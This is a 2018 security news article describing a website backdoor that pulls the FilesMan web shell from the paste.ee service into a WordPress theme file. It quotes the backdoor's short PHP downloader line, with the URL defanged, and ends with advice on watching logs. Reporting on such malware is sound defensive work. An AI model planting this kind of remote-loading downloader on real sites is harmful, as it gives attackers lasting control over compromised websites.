The malicious code allows attackers to reinfect websites

Sep 18, 2018 17:20 GMT  ·  By

Bruno Zanelato found a website backdoor which, unlike other siblings of its family, does not embed its code within a web page but it loads it from an online clipboard service.

Website backdoors are specially devised malicious tools hidden within a website's code and designed to allow an attacker to reinfect the target and retain control even after the site has been cleaned.

"71% of all compromised targets had a PHP-based backdoor hidden within the site," says the expert's report. "The effectiveness of these backdoors comes from their elusiveness to most website scanning technologies."

Most malware tailored for websites and added to a web page's code use obfuscation techniques to prevent website owners from discovering the true purpose and goal of the hidden code.

However, as described in Zanelato's blog post, the unusual backdoor he discovered does not try to hide in plain sight within the pages of the target website like many of its counterparts.

Instead, it adds a PHP file within the website's structure containing the payload downloader code, that can be found at wp-content/themes/buildup/db.php.

The backdoor downloads its payload from the paste.ee web-based paste service

The code listed below will download the backdoor which will then grab the malware designed to allow the website attacker to reinfect the website at a later date.

code
if ( @copy('hxxps://paste[.]ee/r/3TwsC/0', 'db.php') ) {
echo "Copy_success"; 
}else{
echo "Copy_failed"; 

?>
Once decrypted, the contents of the downloaded malicious payload revealed that the "minimalist" backdoor is the FilesMan malware which enables threat actors to gain access, modify and reinfect websites at any time post-infection.

Websites can be "backdoored" regardless of the server or CMS they're using, with the help of exploits created for unpatched versions of Joomla, Wordpress, and osCommerce, or via stolen authentication credentials.

Mitigating website backdoor attacks is a matter of keeping close watch of your logs always looking for things that seem out of place like outgoing connections to unknown servers.

Photo Gallery (3 Images)

Web backdoor.
Obfuscated malware downloader codeDecrypted malware downloader code
Open gallery